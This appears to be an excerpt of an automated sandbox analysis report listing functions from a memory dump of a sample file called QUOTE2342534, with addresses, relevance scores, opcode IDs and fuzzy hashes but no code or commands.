                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: MUI
                                                                                                                                                                                                                                                • API String ID: 0-1339004836
                                                                                                                                                                                                                                                • Opcode ID: 1dbb93d224046157780ce912050a169358675ca603c0fac296a0ff84d89b52c1
                                                                                                                                                                                                                                                • Instruction ID: 334f0514766d71f5b8d0de6f656e11b61c361e683e0fd138e9c2815f41c2e950
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1dbb93d224046157780ce912050a169358675ca603c0fac296a0ff84d89b52c1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC826B75E002288FEB25CFA9C884BEDFBB5FF58310F148169D959AB355D7309982CB50
                                                                                                                                                                                                                                                Function 017A6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                                                                                                                • Opcode ID: 80afecf5ce689db4cbf6bbfc53c9aa34c1b6e98d144cf924243cc296c8425e95
                                                                                                                                                                                                                                                • Instruction ID: e6fd89486bf55db7baa08dd12fdcf986ebaafdc7ff06a4cab2d0b80dc0653251
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80afecf5ce689db4cbf6bbfc53c9aa34c1b6e98d144cf924243cc296c8425e95
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1919272940219AFEB21DF94CD85FAEFBB8EF58750F540165F600AB195D774AD00CBA0
                                                                                                                                                                                                                                                Function 017CE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                                                                                                                • Opcode ID: 5e2dc08243945d72dbb1970f71d5b313dc090f16e32d314ad1eaaa3bdaf691a9
                                                                                                                                                                                                                                                • Instruction ID: 78d84c9edf698a3cf8cdf2bc16bb59007bba98319b16c986d52c20030ad652e1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e2dc08243945d72dbb1970f71d5b313dc090f16e32d314ad1eaaa3bdaf691a9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6917072901649AFDB22ABA5DC48FAFFF7AEF85B50F10002DF501A7251EB74A901CB51
                                                                                                                                                                                                                                                Function 0175A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: GlobalTags
                                                                                                                                                                                                                                                • API String ID: 0-1106856819
                                                                                                                                                                                                                                                • Opcode ID: 78921aa5910605e59f2cb985d8be83f28cce63a6220b54431d3bad1ab8056cf8
                                                                                                                                                                                                                                                • Instruction ID: b58ee1a6311c1ae20e2d66f15cbf8d822e0e9ea5aff8a023d18d1f09d6bc7bb2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78921aa5910605e59f2cb985d8be83f28cce63a6220b54431d3bad1ab8056cf8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E47160B5E0020A9FDF28CF9CE590AADFBB1BF48710F14826EF905AB245E7719945CB50
                                                                                                                                                                                                                                                Function 017C4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: .mui
                                                                                                                                                                                                                                                • API String ID: 0-1199573805
                                                                                                                                                                                                                                                • Opcode ID: 1bba803433581530f2d33e745760bf986e85442fe9e5c9bf16f4102a88465cf5
                                                                                                                                                                                                                                                • Instruction ID: b43c0b8c344bcb9c09fb3db9db4954580171aa29c2d3c979181e33ba472d20bc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bba803433581530f2d33e745760bf986e85442fe9e5c9bf16f4102a88465cf5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5519C72D0022ADBDB10DF9DD854AAEFBB4AF08F50F05416EEA12BB254D3349D01CBA4
                                                                                                                                                                                                                                                Function 0173E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: EXT-
                                                                                                                                                                                                                                                • API String ID: 0-1948896318
                                                                                                                                                                                                                                                • Opcode ID: 5cdb6adbe25e606278d503117ec4eaa6dd161ab24c07e5bf5fc972d832897e47
                                                                                                                                                                                                                                                • Instruction ID: efd5843aef838ffb2ec29d22b7bfa9a209583a2626ee88f5456fd93e4cfea7a7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cdb6adbe25e606278d503117ec4eaa6dd161ab24c07e5bf5fc972d832897e47
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C941A0725083169BD722DA75C844BABFBE8AFC8714F04092DFA84E7181EB74D904C797
                                                                                                                                                                                                                                                Function 0179C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: BinaryHash
                                                                                                                                                                                                                                                • API String ID: 0-2202222882
                                                                                                                                                                                                                                                • Opcode ID: 85dbadb722f4fd83cbe14d8cc4a1bd6aef55d60694ad72464c86c9e79917d9ca
                                                                                                                                                                                                                                                • Instruction ID: e7619280901aa4b5581a27708df533cc6afe36f773f073f6e86c43d4470e76ea
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85dbadb722f4fd83cbe14d8cc4a1bd6aef55d60694ad72464c86c9e79917d9ca
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C4162B1D0022DAEDF21DB50DC84FDEF77CAB44714F0045A5AB08AB145DB709E888FA4
                                                                                                                                                                                                                                                Function 017B6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: #
                                                                                                                                                                                                                                                • API String ID: 0-1885708031
                                                                                                                                                                                                                                                • Opcode ID: fac41f26736cfb4a68d0ad763c8fb23dd1e5af034697dfc82880305e9c27bf5c
                                                                                                                                                                                                                                                • Instruction ID: b3f84210d92c9709e29ef309312cdd939782f527da144a47024e5e49e212d910
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fac41f26736cfb4a68d0ad763c8fb23dd1e5af034697dfc82880305e9c27bf5c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB310531A007199BEB22DF69C894BEEFBB8DF45704F144068FA45AB282DB75ED05CB50
                                                                                                                                                                                                                                                Function 0179CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: BinaryName
                                                                                                                                                                                                                                                • API String ID: 0-215506332
                                                                                                                                                                                                                                                • Opcode ID: 06985b685cfadeb34c43cc3e69979a438c63ebdc30d7c27b2aed52256df45fe5
                                                                                                                                                                                                                                                • Instruction ID: a18ef6f5ee8c1b62f4cd8f612f696ce074dd49b5d16868ffe456a716a9411bc3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06985b685cfadeb34c43cc3e69979a438c63ebdc30d7c27b2aed52256df45fe5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3310336900515AFEF16DB58D845E7FFB74EB80760F014169A905AB291D7309E08EBE0
                                                                                                                                                                                                                                                Function 017A892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 017A895E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                                                                                • API String ID: 0-702105204
                                                                                                                                                                                                                                                • Opcode ID: 07db58fffb1655e15748fc6ca74c1823628dc34df3b7eaa3469d37ff5aba1a13
                                                                                                                                                                                                                                                • Instruction ID: e12fd571fead50e5b09d6e6fd561b46269c75837e558d974914eaf9a1ed8d91a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07db58fffb1655e15748fc6ca74c1823628dc34df3b7eaa3469d37ff5aba1a13
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64012B732002119BE7216B59CC88E96FF69EFC6755B84022CF78506559CB246882CB93
                                                                                                                                                                                                                                                Function 017C2000 Relevance: .8, Instructions: 757COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 57cdefb0f4f11a8237b61ac2cb20159d934f0be5ad168fe21db98a18a2b246ed
                                                                                                                                                                                                                                                • Instruction ID: 97ec14549b2f282836cc629e00522456579741ba0f8ca51d020da1a4436ceb96
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57cdefb0f4f11a8237b61ac2cb20159d934f0be5ad168fe21db98a18a2b246ed
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D442D2766083419FE725CF68C890A6BFBE5BFC8B40F18092DFA8297252D770D945CB52
                                                                                                                                                                                                                                                Function 017B8158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8c9557d20437300e072d43b3986131d588f5f358d4dd505fe58ac39c23388ab1
                                                                                                                                                                                                                                                • Instruction ID: 71a1ead87f07317500e1e874433b712355e7a394e111563f06fc769464fcb846
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c9557d20437300e072d43b3986131d588f5f358d4dd505fe58ac39c23388ab1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8424D75A102198FEB24CF69C881BEDFBF9BF48304F188199E949EB242D7349985CF51
                                                                                                                                                                                                                                                Function 01732840 Relevance: .6, Instructions: 605COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 530f8cdc33212ab1e2993d299b8f07f1ec0781b04c91f7597c727d5cd3b7b4c9
                                                                                                                                                                                                                                                • Instruction ID: b43ae686c2182e96e1084eaf4d94d3af3f027e43e54e6f2f9e4865f07666ea20
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 530f8cdc33212ab1e2993d299b8f07f1ec0781b04c91f7597c727d5cd3b7b4c9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E32F070A40755AFEB25EF69C8487BEFBF2BF84304F24411DE58A9B285D735A842CB50
                                                                                                                                                                                                                                                Function 017CA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1e26f049440275490d572b9a03668b25a7259032d540685343598b349f21061b
                                                                                                                                                                                                                                                • Instruction ID: 4ae8b1277a4f1497b5cc96fab624c2b81cbe4d1919f89a15483374f7d94650db
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e26f049440275490d572b9a03668b25a7259032d540685343598b349f21061b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B22AD706046698BEB25CF2DC094772FBF1BF84B02F18849ED9868B286F735D552DB60
                                                                                                                                                                                                                                                Function 01726A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1e1badbf8bdad0999ab27d951a97233c0866533ffbe4347e902f488df20b4ef5
                                                                                                                                                                                                                                                • Instruction ID: 0ddf44e4240fc6dc4a600ebd960d571f9509ee258f4b418eb5470495567e89ea
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e1badbf8bdad0999ab27d951a97233c0866533ffbe4347e902f488df20b4ef5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0329F71A04215CFDB25DF68C480BAAFBF1FF48310F2485AAE956AB755D734E842CB50
                                                                                                                                                                                                                                                Function 01744A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                                                                                • Instruction ID: 9721b5e01ae2eb0bafb21969d6708c399d3bf107ccd0a0786175bb3ca6c9a106
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60F17071E0021A9BDB15DFA9C584BAEFBF5BF48710F088129EA46AB345E734D841DB90
                                                                                                                                                                                                                                                Function 017B892B Relevance: .4, Instructions: 386COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ffc500d34c74022769c7bf59303a07c662f8c94dad7b31676c9607c77afed80a
                                                                                                                                                                                                                                                • Instruction ID: 444b36b14249ee1f9a8dc10e92bbb23e2a0e7e0a27f9d195f6c5bd1b8689ce56
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffc500d34c74022769c7bf59303a07c662f8c94dad7b31676c9607c77afed80a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AD1E171A0060A8BDF15CF69C881BFEF7F9AF88304F1881AAD955E7241D735EA05CB61
                                                                                                                                                                                                                                                Function 017265D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ff05cc1aa86abf4c5069811eb92ba7621a0a9531e3e1850c45421237f08e2816
                                                                                                                                                                                                                                                • Instruction ID: ccbe04446b6093c0de2c51b1b71074fcea9298715a671d7af77c1df27869e052
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff05cc1aa86abf4c5069811eb92ba7621a0a9531e3e1850c45421237f08e2816
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DE16B71608352CFC715DF28C490A6AFBE0BF89314F15896EF99587352EB31E906CB92
                                                                                                                                                                                                                                                Function 01718397 Relevance: .4, Instructions: 380COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1738452c25bf83169ff9dc3706694474d3ba86e9094cf308f0253cea8f2e6f88
                                                                                                                                                                                                                                                • Instruction ID: 5cc4ea796fa55ace53f6aaf07122a5d34fbdef9a8ac48347a906ba0713462d21
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1738452c25bf83169ff9dc3706694474d3ba86e9094cf308f0253cea8f2e6f88
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9D1EF71A002069BDF14DF6CC880ABAF7A5BF54314F14466DEA16DB288EB34E951CB62
                                                                                                                                                                                                                                                Function 017A8243 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                                                                                • Instruction ID: d623bdc20124b2e94263ff13738f51357e4db6214912d9809230375a038651a2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22B1BE75A00605AFEB24DF98C944BABFBB9BFC4305F90462DAA4297394DA30E905CB11
                                                                                                                                                                                                                                                Function 01730535 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                                                                                • Instruction ID: c2094183a5523e73012e033723a4f7dfb41a39ebd0bcabb5032f9140a1097150
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0BB1E531604646AFDB26DB68C854FBEFBF6AF84300F280199E552D7386DB70E941DB90
                                                                                                                                                                                                                                                Function 017283C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: cd56ee4c4050a41608baf072da25c3f418e885f64266ba054cf11be1333a8829
                                                                                                                                                                                                                                                • Instruction ID: da7fb99e1c3d095bbfcd58ab7e874d5a139ff70be9b325233726a6df487ccaa3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd56ee4c4050a41608baf072da25c3f418e885f64266ba054cf11be1333a8829
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36C166702083818FE764DF19C494BABF7E4BF88304F54496DE98987291E775EA09CF92
                                                                                                                                                                                                                                                Function 0171C427 Relevance: .3, Instructions: 280COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 087e748dd28097af80d0bcca7c190cf246af3f879e78f326df6a74ec66ec27c5
                                                                                                                                                                                                                                                • Instruction ID: 988fcff5d82b4b5e6ef6969dfcf36f7d438e0c40c30f93ac00d11697c8e41a60
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 087e748dd28097af80d0bcca7c190cf246af3f879e78f326df6a74ec66ec27c5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5B17070A402668BEB75CF68C880BADF7B5EF44700F1485E9D50AE7285EB70DD85CB21
                                                                                                                                                                                                                                                Function 0174E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 07c345be85de48878c5e7b566201de9a1ccf5a1946e19aba8b80063f2040e8c7
                                                                                                                                                                                                                                                • Instruction ID: 188991f072076a5147c2e248b41ecc058eda3bd3857a9c64f25a64bf63d4ab27
